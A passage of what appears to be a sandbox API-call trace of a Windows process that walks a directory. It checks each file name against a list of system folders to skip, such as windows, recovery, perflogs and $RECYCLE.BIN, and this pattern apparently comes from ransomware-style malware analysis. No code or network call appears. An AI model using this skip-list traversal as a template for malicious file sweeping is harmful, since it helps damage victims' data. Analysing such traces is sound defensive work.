RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241010, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.034] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd10c55e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2=".") returned 1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="..") returned 1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="...") returned 1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="windows") returned -1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="recovery") returned -1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.034] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="msocache") returned -1 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0073.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.035] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0f9426a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2=".") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="..") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="...") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="windows") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="recovery") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="msocache") returned -1 [0073.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0073.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0073.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0073.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0073.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0073.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0073.035] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b7fe91, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b7fe91, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1ec71c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2=".") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="..") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="...") returned 1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="windows") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="recovery") returned -1 [0073.035] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.036] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.036] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.036] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.036] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="msocache") returned -1 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0073.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0073.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.036] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b59cda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b59cda, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f1370b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34ad8, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="AppVDllSurrogate32.exe", cAlternateFileName="APPVDL~2.EXE")) returned 1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2=".") returned 1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="..") returned 1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="...") returned 1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="windows") returned -1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="recovery") returned -1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="perflogs") returned -1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="documents and settings") returned -1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="$RECYCLE.BIN") returned 1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="system volume information") returned -1 [0073.036] lstrcmpiW (lpString1="AppVDllSurrogate32.exe", lpString2="msocache") returned -1 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate32.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate32.exe", cchWideChar=22, lpMultiByteStr=0x241060, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVDllSurrogate32.exe", lpUsedDefaultChar=0x0) returned 22 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate32.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate32.exe", cchWideChar=22, lpMultiByteStr=0x241100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVDllSurrogate32.exe", lpUsedDefaultChar=0x0) returned 22 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0073.037] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e2e85a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e4d8, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="AppVDllSurrogate64.exe", cAlternateFileName="APPVDL~1.EXE")) returned 1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2=".") returned 1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="..") returned 1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="...") returned 1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="windows") returned -1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="recovery") returned -1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="perflogs") returned -1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="documents and settings") returned -1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="$RECYCLE.BIN") returned 1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="system volume information") returned -1 [0073.037] lstrcmpiW (lpString1="AppVDllSurrogate64.exe", lpString2="msocache") returned -1 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate64.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate64.exe", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVDllSurrogate64.exe", lpUsedDefaultChar=0x0) returned 22 [0073.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate64.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVDllSurrogate64.exe", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVDllSurrogate64.exe", lpUsedDefaultChar=0x0) returned 22 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0073.038] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2=".") returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="..") returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="...") returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="windows") returned -1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="recovery") returned -1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="perflogs") returned -1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="documents and settings") returned -1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="system volume information") returned -1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="msocache") returned -1 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 19 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 19 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.038] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0073.038] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2=".") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="..") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="...") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="windows") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="recovery") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="perflogs") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="documents and settings") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="system volume information") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="msocache") returned -1 [0073.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.039] RtlAllocateHeap (HeapHandle=0x1e0000, 